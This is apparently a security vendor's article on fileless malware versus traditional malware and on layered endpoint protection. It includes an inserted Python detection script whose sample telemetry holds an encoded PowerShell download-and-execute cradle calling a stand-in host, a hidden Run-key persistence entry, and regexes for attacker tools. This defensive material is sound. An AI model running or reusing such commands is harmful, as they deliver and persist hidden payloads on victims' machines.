Companies that opt for digitalization not only gain in agility, they also optimize their budgets while boosting their competitiveness. Alongside these gains, however, the adoption of new technologies also extends the attack surface that cybercriminals can exploit to spread their threats and compromise the overall security of companies.
Threats were traditionally designed either to run silently as independent applications on victims' computers or to compromise the integrity of existing applications by changing their behavior. To combat traditional malware, endpoint security solutions incorporate technologies designed to scan files stored on disk before they are executed.
Traditional malware vs. fileless malware
Some of the more common attack techniques involve getting the victim to download a malicious application, which then runs to monitor their behavior, or exploiting a vulnerability in installed software to download additional components and execute them without the victim's knowledge.
Traditional threats must therefore write to the victim's disk before executing the malicious code. Signature-based detection was created precisely for this reason, as it can identify a file known to be malicious and prevent it from being saved or executed on a machine. However, new mechanisms such as encryption, obfuscation, or polymorphism have made traditional detection technologies much less effective, with cybercriminals now able to change the appearance of a file for each victim and to make its code harder for security scan engines to analyze.
Classic, file-based malware typically gains illegitimate access to an operating system and its binaries by creating or unpacking additional files and dependencies, such as .dll, .sys, or .exe files, each with a different function.
They can also install themselves as drivers or rootkits to take full control of the operating system, provided they can use a valid digital certificate that keeps them from triggering file-based endpoint security technologies. The highly sophisticated Stuxnet malware, designed to infiltrate a particular target while remaining persistent, is a prime example: because its different modules carried a digital signature, it could spread silently from one victim to another until it reached its target.
Fileless malware is completely different from traditional malware in the way it executes malicious code and evades conventional detection technologies. As the name suggests, fileless malware does not need to save a file to disk to run. The malicious code can be executed directly in the memory of the infected machine, which means that it will disappear after a system restart. However, cybercriminals have devised different techniques that combine the capabilities of fileless attacks with persistence. For example, malicious code placed in registry entries and executed each time Windows restarts can combine stealth and persistence.
The use of scripts, shellcode, and even encoded binaries is not uncommon for fileless malware that exploits registry entries, as traditional endpoint security systems are generally unable to parse scripts. Since traditional security tools and technologies focus on analyzing static files, fileless attacks can remain on a machine for a very long time before being detected.
The main difference between classic malware and fileless malware is where its components are located, stored, and executed. Fileless malware is increasingly popular with cybercriminals because it lets them evade file scanning technologies while maintaining stealth and persistence.
Mechanisms of infection
While both types of attack rely on the same infection mechanisms, such as infected email attachments or drive-by downloads that exploit vulnerabilities in web browsers or common software, fileless malware typically uses scripts and can exploit legitimate applications to execute commands. For example, scripts attached to booby-trapped Word documents can be executed automatically by PowerShell, a native Windows tool. The resulting commands can then send detailed information about the victim's system to the attacker or download a silent payload that a local security solution cannot detect.
This type of attack can also involve a malicious URL that redirects the user to a website exploiting a vulnerability in Java to run a PowerShell script. The script itself is just a series of legitimate commands that download a binary and run it directly in memory. A typical file scanning security mechanism will not detect the threat.
These pernicious attacks typically target specific organizations and businesses and are designed to conceal both the intrusion and the exfiltration of data.
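As an added example (not code from the original post), here is a small Python triage heuristic run over constructed Run-key values and process-creation events. It covers both the registry-based persistence described earlier and the Office-to-PowerShell chain above: it decodes a PowerShell -EncodedCommand argument so that download-and-execute keywords hidden by the encoding become scannable, and it flags script hosts spawned by an Office application. The indicator list, the sample telemetry and the `x.invalid` host are assumptions made for the example.

```python
import base64
import re
# Command-line indicators (label, case-insensitive regex); assumed heuristics, not a vendor rule set
INDICATORS = [
    ("powershell host", r"\bpowershell(\.exe)?\b"),
    ("hidden window", r"-w(indowstyle)?\s+hidden\b"),
    ("execution policy bypass", r"-(ep|executionpolicy)\s+bypass\b"),
    ("in-memory execution", r"\b(iex|invoke-expression)\b"),
    ("remote download", r"downloadstring|downloadfile|net\.webclient|invoke-webrequest"),
    ("script host / LOLBin", r"\b(mshta|wscript|cscript|regsvr32|rundll32)(\.exe)?\b"),
]

def decode_encoded_command(cmdline):
    # PowerShell accepts -e/-ec/-enc/-EncodedCommand followed by base64 of UTF-16LE text
    m = re.search(r"-e(c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", cmdline, re.I)
    try:
        return base64.b64decode(m.group(2), validate=True).decode("utf-16le") if m else None
    except (ValueError, UnicodeDecodeError):
        return None

def scan_command(cmdline):
    texts, found = [cmdline], []
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:  # keywords hidden by the encoding become scannable
        found.append("encoded command")
        texts.append(decoded)
    for label, pattern in INDICATORS:  # match raw and decoded text alike
        if any(re.search(pattern, t, re.I) for t in texts):
            found.append(label)
    return found

def scan_events(events):
    # events: (source, parent, image, cmdline) tuples; returns (source, image, findings) for hits
    hits = []
    for source, parent, image, cmdline in events:
        found = scan_command(cmdline)
        if parent.lower() in {"winword.exe", "excel.exe", "powerpnt.exe"}:  # Office spawning a script host
            found.append("launched by Office application")
        if found:
            hits.append((source, image, found))
    return hits

# Constructed sample telemetry (not from a real incident); the payload is encoded here so its content stays visible
ENCODED = base64.b64encode("IEX (New-Object Net.WebClient).DownloadString('http://x.invalid/p')".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    ("run-key", "", "OneDrive.exe", r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("run-key", "", "powershell.exe", "powershell.exe -NoP -W Hidden -Enc " + ENCODED),
    ("process", "WINWORD.EXE", "powershell.exe", r"powershell.exe -ExecutionPolicy Bypass -File C:\Users\Public\inv.ps1"),
    ("process", "explorer.exe", "mshta.exe", r"mshta.exe C:\Users\Public\update.hta"),
]
```

Calling `scan_events(SAMPLE_EVENTS)` returns only the three suspicious entries; the benign OneDrive Run-key value produces no findings.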
The next generation of endpoint security platforms
The latest endpoint security platforms typically combine multi-level protection, i.e. file scanning and behavior monitoring, with machine learning technologies and a sandbox system for threat detection. Some technologies rely solely on machine learning algorithms - a single level of protection - while other endpoint protection platforms use technologies that encompass multiple layers of protection, enhanced by machine learning. The algorithms are then dedicated to the detection of advanced and sophisticated threats during the pre-execution, execution, and post-execution phases.
Today, a common mistake is to think of machine learning as an autonomous level of security capable of detecting any type of threat. An endpoint protection platform that relies solely on machine learning will not be able to enhance the security of an enterprise.
Machine learning algorithms are designed to strengthen the various layers of security, not to replace them. Spam filtering, for example, can be strengthened by machine learning models, just as traditional malware detection can use them to determine whether unknown files may be malicious.
Signature-less security layers are designed to provide more protection, visibility, and control for preventing, detecting, and blocking all types of threats. Given these new attack modes, next-gen endpoint security platforms must protect users against tools and techniques that exploit known but unpatched vulnerabilities, and of course unknown vulnerabilities, in applications.
We will stress, however, that traditional signature-based technologies are not obsolete and should not be scrapped.
By being able to quickly and accurately identify a file known to be malicious, they provide an important layer of security. The combination of machine learning, signature-based, and behavioral-based security layers creates security solutions that can manage known malware, but also tackle unknown threats to enhance business security.